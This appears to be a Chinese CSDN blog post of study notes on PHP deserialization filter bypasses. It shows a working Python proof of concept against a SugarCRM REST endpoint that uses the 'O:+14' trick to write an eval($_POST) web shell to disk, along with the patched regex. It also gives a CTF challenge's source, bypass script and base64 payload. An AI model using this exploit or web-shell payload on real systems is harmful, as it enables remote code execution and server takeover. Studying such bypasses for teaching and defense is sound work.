PHP序列化与反序列化记录

最新推荐文章于 2022-07-07 13:15:15 发布
最新推荐文章于 2022-07-07 13:15:15 发布
阅读量553 收藏
点赞数
分类专栏: 安全学习 文章标签: 正则表达式 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LYJ20010728/article/details/110671799
版权

(1): preg_match(’/[oc]:\d+:/i’, $value, $matches);

在include/utils.php类有sugar_unserialize方法

function sugar_unserialize($value)
{
    preg_match('/[oc]:\d+:/i', $value, $matches);

    if (count($matches)) {
        return false;
    }

    return unserialize($value);
}

可以看对序列化的字符串进行了过滤,其实主要过滤的就是禁止Object类型被反序列化。虽然这样看起是没有问题的,但是由于PHP的一个BUG,导致仍然可以被绕过。只需要在对象长度前添加一个+号,即o:14->o:+14,这样就可以绕过正则匹配。关于这个BUG的具体分析,可以参见php反序列unserialize的一个小特性。
最后的PoC就是

import requests

url = "http://localhost/sugar/service/v4/rest.php"
data = {
    'method':'login',
    'input_type':'Serialize',
    'rest_data':'O:+14:"SugarCacheFile":4:{S:17:"\\00*\\00_cacheFileName";S:15:"../custom/1.php";S:14:"\\00*\\00_localStore";a:1:{i:0;S:26:"<?php eval($_POST[\'1\']);?>";}S:16:"\\00*\\00_cacheChanged";b:1;}'
}

requests.post(url,data=data)

修复
这个漏洞是知道5.6.24版本才进行修复的,修复的方式也是十分的简单
在这个版本中,上述的PoC已经不能够使用了。以下是修复代码
在include/utils.php类有sugar_unserialize方法

function sugar_unserialize($value)
{
    preg_match('/[oc]:[^:]*\d+:/i', $value, $matches);

    if (count($matches)) {
        return false;
    }

    return unserialize($value);
}

可以看到,正则表达式已经变为/[oc]:[^:]*\d+:/i,那么通过+好来进行绕过的方式已经不适用了,这样就修复了这个漏洞了
参考链接
一道例题:链接

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

绕过:

<?php
class Demo{
    private $file = 'fl4g.php';
}
$a = serialize(new Demo);
$a = str_replace('O:4', 'O:+4', $a);
$a = str_replace(':1:', ':2:', $a);

echo base64_encode($a);
?>

playload:?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

H3rmesk1t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
关于正则匹配preg_match(‘/^O:\d+/‘)的绕过的几种方法
m0_63138919的博客
10-13 2061
本文为preg_match('/^O:d+/')正则 匹配绕过的方法
讲讲PHP序列化反序列化解析
pipujopijhpo的博客
04-19 168
序列化 序列化格式 在PHP中,序列化用于存储或传递 PHP 的值的过程中,同时不丢失其类型和结构。 序列化函数原型如下: string serialize ( mixed $value ) 先看下面的例子: class CC { public $data; private $pass; public function __construct($data, $pass) { $this->data = $data; $this-&
攻防世界 web部分的Web_php_unserialize的writeup
dchua123的专栏
04-01 1419
这个题就是三个点: 1、$file改成fl4g.php; 2、绕过:preg_match('/[oc]:\d+:/i', $var) 3、跳过__wakeup()。 步骤如下: <?php class Demo { private $file = 'fl4g.php'; } $a= serialize(new demo); $a=str_replace('O:4',...
php反序列化姿势学习
彼岸花苏陌的博客
01-16 2300
php反序列化姿势学习1.__wakeup()函数绕过2./[oc]:\d+:/i研究欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 1.__wakeup()函数绕过 wakeup函数作为ph
php函数(三)eval函数对比详解
tutu123456789101112的博客
03-05 881
preg_match(’/^\w*$/’,$a ),对$a的值进行匹配,如果是特殊字符返回error,反之进入eval. var_dump(),结构化的打印变量值. eval(),字符串按照 PHP 代码来计算. &amp;amp;lt;?php include &amp;quot;flag.php&amp;quot;; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )) { die...
php数据序列化测试实例详解
12-19
如果你需要快速的序列化反序列化,同时对数据大小敏感,那么`msgpack_pack`可能是最佳选择。如果需要的是人可读性或兼容JSON标准,`json_encode`则是更好的选项。而`serialize`虽然在效率上不占优势,但它能处理...
php序列化和json使用介绍
10-27
2. 对于对象,序列化不仅保存其属性,还记录类名和类路径,以便反序列化时能重建原始对象。 3. 序列化后的字符串可能会包含可识别的PHP特定语法,例如`a:`表示数组,`O:`表示对象等。 【JSON】 JSON是一种轻量级的...
tsqlphpunserialize:在 T-SQL 中反序列化 PHP 序列化数据
06-13
tsqlphpunserialize 在 T-SQL 中反序列化 PHP 序列化数据最初发布在 Stack Exchange 上: : noredirect=1# 我正在尝试从 Magento 订单中提取礼品卡代码。 其他一些代码使用 Magento API 从 Magento 检索订单信息作为...
TP5.0.xRCE&5.0.24反序列化分析1
最新发布
08-03
【标题】:“TP5.0.x RCE & 5.0.24 反序列化分析1” 在本文中,我们将深入探讨ThinkPHP 5.0.x版本,特别是5.0.24版本中的反序列化漏洞及其分析。ThinkPHP是一个广泛使用的PHP框架,其在开发过程中的一些特性可能...
PHP求最大子序列和的算法实现
10-28
2. 初始化两个下标变量`$start`和`$end`,用于记录最大子序列的起始和结束位置,初始值分别为0。 3. 遍历数组中的每个元素,将元素值累加到`$thissum`上。 4. 如果`$thissum`大于`$maxsum`,则更新`$maxsum`并记录...
两道反序列化例题
limenzzz的博客
05-03 1259
攻防世界: 1.Web_php_unserialize 先代码审计,发现定义了demo类,而在其中有一句 这个函数说明在销毁demo时会高亮回显file。而且前面提示flag在fl4g.php中,于是需要构造反序列化的demo类,且要绕过wake_up函数,根据上篇可知,只要输入的数据数少于规定的就可以绕过。于是需要构造 O:4:"demo":1:{s:10:"Demofile";s:8:"fl4g.php";} //原构造,未构建任何绕过 O:4:"demo":2:{s:10:"De
ctfshow 反序列化
m0_62422842的博客
07-07 1771
涉及到的题目是web254~web266
安恒12月赛Web题解
0verWatch的博客
12-22 2876
吐槽一下 这次的web题目感觉完全是新手题,思路很直接,我就不掺和了,做完web就逃23333,继续完成密码学课程实验报告去了。。。但还是记录一下。 easy 这个题目考的是一个php反序列化的一个绕过,上来就给了一段代码,很简单 &amp;lt;?php @error_reporting(1); include 'flag.php'; class baby { public $f...
php函数
weixin_43995930的博客
10-09 310
php函数希望能够帮助到你serialize() -- 对象序列化功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 希望...
攻防世界-Web-Exercise-Wirteup
08-08 395
攻防世界Web题进阶区题目部分记录。前面题型比较基础,仅记录较为典型的题目用于以后知识点的回顾。 目录 Web_php_unserialize Web_php_unserialize 题目描述: <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function _
攻防世界:web——Web_php_unserialize
Zeker62的博客
08-23 164
靶场内容: <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_fi...
[wp] 攻防世界 Web_php_unserialize
热门推荐
MercyLin的博客
09-22 3万+
先是一段代码审计: <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight...
PHP preg_match()进行正则表达式匹配
waiwai021的博客
03-24 2074
preg_match() 函数用于进行正则表达式匹配,成功返回 1 ,否则返回 0 。 preg_match() 匹配成功一次后就会停止匹配,如果要实现全部结果的匹配,则需使用preg_match_all() 函数。 preg_match (pattern , subject, matches) 参数 描述 pattern
Web_php_unserialize
m0_56107268的博客
05-04 936
<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() { .
Android连接WAMP服务器与PHP MySQL数据库教程
例如,创建新记录时,Android应用会发送包含必要数据的POST请求到PHP脚本,PHP脚本接收到数据后,连接到MySQL数据库并执行插入操作。 5. **数据传输格式** 数据通常是JSON或XML格式,便于在Android和PHP之间传递。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值